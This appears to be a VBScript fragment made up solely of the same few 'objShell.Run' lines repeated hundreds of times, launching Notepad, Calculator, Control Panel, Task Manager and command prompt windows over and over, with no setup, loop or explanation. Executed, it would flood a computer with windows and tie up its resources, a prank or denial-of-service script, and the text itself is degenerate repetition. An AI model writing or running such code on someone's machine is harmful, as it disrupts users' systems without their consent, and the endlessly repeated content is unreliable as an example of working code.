objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
